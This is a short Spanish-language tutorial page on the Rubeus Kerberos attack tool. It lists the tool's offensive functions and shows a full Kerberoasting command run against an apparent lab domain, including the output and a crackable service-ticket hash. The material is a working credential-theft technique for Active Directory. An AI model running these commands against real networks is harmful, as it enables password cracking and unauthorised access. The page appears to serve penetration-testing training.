Utilizando Rubeus
Rubeus es una potente herramienta de post-explotación y manipulación de Kerberos que se ha vuelto muy popular en la comunidad de seguridad, especialmente entre aquellos que realizan pruebas de penetración y auditorías de red en entornos de Directorio Activo (AD). Fue desarrollada en C# y se utiliza para interactuar con el protocolo de autenticación Kerberos.
Funciones clave de Rubeus:
Solicitar Tickets Kerberos (TGTs): Rubeus puede solicitar Ticket Granting Tickets (TGTs) utilizando contraseñas, hashes o incluso claves.
Kerberoasting: Rubeus es capaz de solicitar Ticket Granting Service (TGS) tickets para cuentas de servicio y luego intentar descifrar estos tickets fuera de línea para obtener contraseñas en texto claro, una técnica conocida como Kerberoasting.
Overpass (Pass-the-Ticket): Rubeus puede realizar ataques de "Overpass", donde los TGTs son utilizados para autenticarse en otros sistemas sin conocer la contraseña del usuario.
Ticket Renewal: Puede renovar tickets válidos que aún estén dentro de su período de renovación.
Dumping Tickets: Rubeus puede extraer tickets de la memoria y almacenarlos para su uso o análisis posterior.
Manipulación de Tickets: Puede purgar, renovar e incluso falsificar tickets de Kerberos.
Hunting de Tickets: Rubeus puede buscar en la red tickets específicos que proporcionen acceso a ciertos recursos o que posean ciertos privilegios.
Ataques de Fuerza Bruta: Puede intentar fuerza bruta contra cuentas de usuario con el objetivo de obtener un TGT.
Para realizar un ataque de Kerberoasting utilizando Rubeus:
PS C:\Users\Public\TOOLS> ./Rubeus.exe kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.3
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : spartancybersec.corp
[*] Searching path 'LDAP://First-DC.spartancybersec.corp/DC=spartancybersec,DC=corp' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : roast.user
[*] DistinguishedName : CN=roast.user,CN=Users,DC=spartancybersec,DC=corp
[*] ServicePrincipalName : MSSQL/sql.spartancybersec.corp
[*] PwdLastSet : 9/29/2023 2:03:36 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*roast.user$spartancybersec.corp$MSSQL/sql.spartancybersec.corp@spar
tancybersec.corp*$A8DDCBEA1C6AEFE971C4BA672CBC9F32$8D3C7A07D449581969F4AB91BCDBA
8FB06FFC89DB32DBF7E1A749CC4ED6B75F94081A66AC6800DF451243CCFFC99ECF84B329247D3C8A
BF0E8B81684171DC99E1D1261BED8BEBB55FB094E1349FF0FC976C5F6DDA37F3BFF6263CCAA7A4A1
466893493B92D5B45FD49D6793070134551E1CA418528F76521F4E76CA67FC27A36207507A5E6CC4
F26211816F7455CFD3C9A32B1DE98C3F8C73CB70D25D8DDFC67084316856736B1D363177BA112F57
096D188DB465A2A43B3FC3902D8BED0CC200A3273F8798FBA72A9585E6E2F728DEDE48CB67841106
4FDC0A58011A42B93301D4F98F47DD26E02DBECBF8FF7053472879C4105F66CACA699B62D6DFC70E
91351AC5F8A778A622DACB54BF9B0E7D91D264A23D62014B2E5CB4088B5ED8F1F13C46F7CBA74D5B
FB4207F3FE5FAB512CD3FE9E1A41AE02C710895F656CF8562B58F516E5B656162F22CBC9FA2E1FF5
E58A8D19491D751D187AAC82810EEF259A8FB78373B37A192A8E8BB553D437E765B459A4AFB2F7BD
6E0B4CC775244503407861063F697AA79212EB01CF96B81A8A18666F3E2EC108DC45C24EF8392F11
44D7DBB797DFB0B5E078EB707573B1FCE19B7CF0196684899100E8716D6AAF790804D6F755832CB6
1666A982937193FF2681632448BD1BC670552458B6FF1ECD6FA7384CB1426BE5332CF363624D7E58
E57EB6EAD8D5E637B5F4EB5FCF9660157C5A4D02BE879D341189067A771AED1ABB44C2FF194B21D6
4F50D6760B229FB8B654347AE9E22E3D41A93EAFD655B71C63BD25ECA4082F82719CAC5B3A22A085
C994925C876054DADB4440A047E7A0E2290EB39D9FDE403285E25815EEB16AB9382C2039A97FE9A9
45B7C55B2191EE9BAF73A004916D2C36423A33CA219362B864793D5D6E4ED3B62FE9EB584DE00AEB
E7FD83DEB19C8D78CD24F2F9915824E79A56EA87C0598DCD00AC8A38FFB28C8B3128845EFF57A529
04D4E3E70E1F1D575E67B4CB93C4D467CBF4AB94280316C605795347C90B174C9B2B05F2B65E8865
38400A240C5ABC729CA0BC63A35675C1790A28C43EAC15EA322E29AF15CDE522BADA7A44F6D0CD7D
73EA110E860C92CB839B27E6DF530F7D30C1C886150A4D51DAC872DF5210C81A9BD22092202E70C0
3EE542F3690B82781C18741FB747298A33C1226D671C5F1B00A7B5D1DD46C8C7184466EB83F5D38A
1E1297436D9DD845704A489A38ABF11FFD996DF0A97D703A4D611DFEF66FFAAC80F5DA75FBA4A6D7
1416D193A15F1C195E8DAB0FD2EC8AB9EC0952657607965C8FE0B1C1AC66D8CB36804A497AFD1466
87BD3A337630ACF8707406E5B27C56665C5C6BB6CEECC6FBB95D3E472FA818BEE0F1A2466B8807E2
D524746EF79B77A6E104FDA867BF23F80293BD7C64329663ED5F6FA02CF9658B4E2EFAC662502B3C
21592BE2C4B1155AF70C07A87CB1143C2EDFE86FE75E70E21014E4E072EE49C1A1ACA6102F4FEE01
FACBB2F4629988FA2B7CA4A91583604B81AE6FD06393C4A915362796ED4D780B1FEC6C7C510B43B4
D68971FAEB491F84F48A48DCB680639BBA7551188102BF48DFE974D8A94B3F12A619526C2925A28B
5E22653A03A6C97BA72478531FC76CD24E9AEAD779F07C6778D2212D77DF238DCBBB9E4234201D40
824654CE64258DD8A6A82D5862DA71BE067FFADBE78282552EE5DDD0D33AADB0C6F06
Última actualización
¿Te fue útil?